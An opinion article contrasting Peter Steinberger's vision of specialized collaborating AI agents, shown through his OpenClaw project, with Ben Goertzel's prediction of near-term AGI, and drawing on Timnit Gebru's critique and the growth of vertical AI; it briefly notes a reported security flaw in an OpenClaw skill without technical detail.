Two Visions of AI’s Future, One Week Apart
Within 48 hours of each other in early February 2026, two very different voices articulated two very different futures for artificial intelligence. On Saturday the 8th, Peter Steinberger—the Austrian developer whose open-source AI agent OpenClaw had exploded to 160,000 GitHub stars practically overnight—told Y Combinator that the future belongs to swarms of specialized AIs, not a single all-powerful one. On Tuesday the 11th, Ben Goertzel—the computer scientist who coined the term “artificial general intelligence” over twenty years ago—told a Hong Kong conference that AI would surpass human strategic thinking within two years.
Same week. Same industry. Completely opposite conclusions about where it’s all heading.
This isn’t a niche academic debate. The answer determines how hundreds of billions of dollars get allocated, which companies survive, and what skills matter for the next decade. If the AGI camp is right, we’re building toward a single transformative moment—and everyone not building toward that moment is wasting time. If the specialization camp is right, the entire AGI race is a misallocation of capital chasing a mirage, and the real money is in narrow, deep, unglamorous tools that solve specific problems extraordinarily well.
An Austrian developer who sold his PDF company for ~€100M, came out of retirement to build OpenClaw—a local-first AI agent that runs on your own computer and controls your apps. 160K GitHub stars in days. He argues that the future isn’t one giant brain; it’s countless specialized agents collaborating, the way human society already works.
A computer scientist and mathematician who has spent three decades working toward machines that match and exceed human-level reasoning. He leads the Artificial Superintelligence (ASI) Alliance and SingularityNET, a decentralized AI marketplace. He claims we’re two years from AI that out-thinks humans at high-level strategy.
What One Human Can’t Do Alone
Steinberger’s argument starts with a deceptively simple question: “What can one human being actually achieve? Do you think one human being could make an iPhone, or one human being could go to space?”
His point: humans are already specialized. We build civilizations not through individual omniscience but through vast networks of specialists who collaborate. An engineer doesn’t need to understand patent law. A surgeon doesn’t need to know how to grow wheat. The power comes from the system, not the individual node.
Steinberger believes AI should follow the same pattern. Rather than building one model that knows everything—the AGI dream—we should build swarms of focused, capable agents that each do one thing brilliantly, then let them coordinate. He calls this “swarm intelligence,” and OpenClaw is his proof of concept.
OpenClaw itself is a living example of this philosophy. It doesn’t try to be superintelligent. It runs locally on your computer, calls external LLM APIs when it needs language capability, and orchestrates across messaging platforms, file systems, smart home devices, and more. When Steinberger sent it a voice message and it didn’t have a speech-recognition model installed, it didn’t crash. It wrote its own API call to OpenAI’s Whisper service, transcribed the audio, and replied—all in nine seconds, with no pre-written script.
That’s not general intelligence. That’s a specialized agent being resourceful within a well-defined scope. And to Steinberger, that’s the point. The models we already have are good enough as building blocks. The engineering challenge isn’t making them smarter—it’s making them useful, composable, and personal.
160,000+ GitHub stars in its first week. 2 million visitors in its first week. 300,000 lines of code. Supports Signal, Telegram, Discord, WhatsApp as interfaces. Runs locally—your memory is a folder of Markdown files on your machine. Steinberger’s bold prediction: 80% of today’s apps will completely disappear, replaced by goal-driven agents that coordinate tasks across systems.
The 80% Prediction
Steinberger extends this logic to a provocative conclusion: most apps are just database frontends—pretty interfaces for entering and retrieving data. When AI agents can read, write, and coordinate data directly, the interface layer becomes unnecessary. His example: why do you need a calorie-tracking app when your agent already knows what you ate, understands your goals, and automatically adjusts your workout plan?
Only apps with unique hardware interfaces or sensor access will survive, he argues. Everything else is overhead that agents will quietly absorb. It’s a vision of AI that has nothing to do with superintelligence and everything to do with plumbing—connecting systems, automating workflows, and eliminating friction.
Two Years Until We’re Outthought
Ben Goertzel sees a different future, and he has a timeline: two years. Speaking at Consensus Hong Kong on February 11, the man who coined “artificial general intelligence” predicted that AI will surpass human strategic thinking by roughly 2028. Not narrow tasks. Not pattern matching. High-level, imaginative, strategic reasoning—the kind of thinking that, until now, has been the uniquely human contribution.
Goertzel’s argument rests on trajectory rather than present capability. He concedes that current AI systems, including his own Quantium project for predicting Bitcoin volatility, are good at specific predictive tasks but still lack the kind of open-ended strategic imagination that humans bring to complex, novel situations. But he believes that gap is closing rapidly, and that the convergence of large language models, decentralized AI infrastructure, and new architecture paradigms will produce genuine general intelligence within the decade.
It’s a position he’s held consistently for years. At the Web Summit in 2023, he predicted AGI was “only a few years away.” In a 2023 interview, he estimated AI could replace 80% of human jobs in the near term even without achieving AGI. He published nine predictions for 2026 that describe not a single dramatic breakthrough but a “steady accumulation of advances” that bring AI closer to the threshold of human-level thinking.
The Infrastructure Argument
For Goertzel, the current market cycle isn’t a bubble—it’s a “stress test” for the infrastructure that will eventually host AGI. SingularityNET, his decentralized AI marketplace, aims to provide the coordination layer for AI systems that are more than the sum of their parts. Where Steinberger sees swarms of specialized agents as the endpoint, Goertzel sees them as a stepping stone toward something qualitatively different: a unified intelligence that emerges from the interaction of many specialized components.
This is the subtle but crucial difference between the two camps. Both believe in distributed, collaborating AI systems. But Steinberger thinks the collaboration itself is the product—and that no emergent “super-intelligence” is necessary or likely. Goertzel thinks the collaboration is the mechanism by which genuine general intelligence will arise.
AGI as Fiction, Engineering as Discipline
Steinberger is not alone in his skepticism. One of the most rigorous critiques of the AGI paradigm comes from Timnit Gebru, the computer scientist who co-led Google’s Ethical AI team before being fired in 2020 and went on to found the Distributed AI Research Institute (DAIR).
In a November 2025 video published by Nature—alongside voices from Anthropic, DeepMind, and Microsoft AI—Gebru called AGI a “fictional thing.” Her argument is structural: the backbone of engineering lies in building well-scoped, testable systems. You cannot meaningfully test or evaluate an undefined system. And AGI, by its nature, is undefined—a moving goalpost that expands every time existing AI achieves something new.
In a 2024 academic paper co-authored with Émile P. Torres, Gebru went further, tracing the intellectual roots of the AGI movement to 20th-century eugenics and arguing that the pursuit of an undefined “machine god” is pushing the industry toward labor exploitation, environmental damage, and the centralization of power under the language of “benefiting humanity.”
AGI is a fictional thing. The backbone of engineering lies in building well-scoped, testable systems. The pursuit of an undefined ‘machine god’ pushes the industry toward deeper labor exploitation and environmental damage.
Even if models are general-purpose, shouldn’t they also move towards specialization? What can one human being actually achieve alone? Swarm intelligence—specialized AIs working together—will replace the dream of a single all-powerful AI.
The human brain is better at taking the imaginative leap to understand the unknown. It won’t last, though. We should enjoy it for a couple more years. The current cycle is a stress test for the infrastructure that will host AGI.
Fine-tuned small language models will be the big trend and become a staple used by mature AI enterprises in 2026, as the cost and performance advantages will drive usage over out-of-the-box LLMs.
The Engineering Pragmatist Position
Gebru’s critique resonates with a growing cohort of practitioners who are less interested in whether we’re building toward AGI and more interested in whether the systems they ship today actually work reliably. Their argument: even if AGI were achievable, the most urgent problems in AI are mundane—bias in hiring algorithms, hallucination in medical contexts, security vulnerabilities in agentic systems, the environmental cost of training runs. Chasing the summit while ignoring the base camp is how people die on mountains.
Cisco’s AI security research team recently tested a third-party OpenClaw skill and found it performed data exfiltration and prompt injection without user awareness. One of OpenClaw’s own maintainers warned on Discord that the project is “far too dangerous” for anyone who can’t understand command-line operations. Even the specialization camp has real problems to solve before its vision works safely at scale. But at least those problems are well-scoped and testable—which is precisely Gebru’s point.
Vertical AI Is Already Winning
While philosophers and futurists debate whether AGI is possible or desirable, the market is placing its bets—and the money is flowing toward specialization. The consensus among founders, investors, and enterprise buyers in early 2026 is increasingly clear: the general-purpose model bubble is deflating, and vertical AI is where the value lives.
The pattern plays out across industries. Tempus, which processes clinical and molecular data across oncology, cardiology, and infectious disease, went public with AI systems trained exclusively on medical data. JPMorgan Chase’s Contract Intelligence platform reviews commercial loan agreements using models trained on financial documents, not general web text. John Deere’s See & Spray technology identifies individual weeds in real time using vision models that know nothing about poetry or code—but know everything about agricultural pest identification.
AT&T’s chief data officer, Andy Markus, predicted in January that fine-tuned small language models (SLMs) would become the standard for mature enterprises in 2026, driven by cost and performance advantages over general-purpose LLMs. Mistral, the French open-weight AI startup, has been making similar arguments: their smaller models outperform much larger ones on specific benchmarks after domain-specific fine-tuning.
The Context Moat
The most interesting strategic insight from the vertical AI movement is what practitioners are calling the “context moat.” In a world where foundation models are commoditized—where Qwen, DeepSeek, Llama, and Mistral offer increasingly competitive open-weight alternatives to proprietary models—the sustainable competitive advantage isn’t the model itself. It’s the proprietary data, the domain-specific reasoning chains, and the regulatory knowledge that a general model cannot replicate without massive fine-tuning.
A legal AI startup in 2026 doesn’t just summarize documents; it understands the case law of a specific jurisdiction and can predict the likelihood of a ruling based on historical patterns. A dental scheduling agent outperforms a generic booking tool because it understands insurance verification workflows and treatment scheduling constraints. These are unglamorous problems. They don’t make for exciting keynotes. But they make for profitable companies, and they’re growing at 3–5 times the retention rate of horizontal solutions.
Both Are Right. Neither Is Complete.
The honest answer to “specialization or superintelligence?” is that the debate itself reveals more about the debaters than the technology. Steinberger is a builder. His frame of reference is the next twelve months: what can agents do today, what breaks, what users actually need. Goertzel is a theorist. His frame is the next twelve years: what might intelligence become, where are the mathematical limits, what happens at the threshold?
Both perspectives are useful. Neither alone is sufficient.
Steinberger is right that the immediate future of AI is specialization. The enterprise market in 2026 is emphatically voting with its dollars for narrow, deep, reliable tools over general-purpose moonshots. The most successful AI deployments are boring: document processing, appointment scheduling, inventory optimization, compliance monitoring. These problems don’t need AGI. They need well-scoped systems that work correctly every time and fail gracefully when they can’t.
Goertzel is right that capabilities are converging in ways that make the “narrow vs. general” distinction increasingly blurry. Frontier LLMs already demonstrate broad competence across dozens of domains. Agentic systems that chain specialized models together are beginning to exhibit behaviors that look, from the outside, a lot like flexible general-purpose reasoning. Whether that constitutes “AGI” depends entirely on your definition—which is part of why Gebru calls the term fictional in the first place.
The Human Loop
For the humans in the loop, the practical takeaway is this: ignore the eschatology. Whether AGI arrives in two years, twenty, or never, the work is the same. Build for the problem in front of you. Use the most capable tools available. Scope your systems so they can be tested and evaluated. Don’t confuse aspirational naming with actual capability.
Steinberger built OpenClaw by himself, in his kitchen, using existing APIs and Unix tools. It reached 160,000 stars because it solved a real problem: letting a computer do things on your behalf. Not because it was intelligent in some cosmic sense, but because it was useful in a mundane one. That’s the lesson the specialization camp offers, and it’s one worth absorbing even if you believe Goertzel’s timeline.
Because whether or not a machine eventually out-thinks us, the machines we have today are powerful enough to reshape entire industries—if we stop waiting for the god and start building the plumbing. The revolution doesn’t need to be general to be transformative. It just needs to work.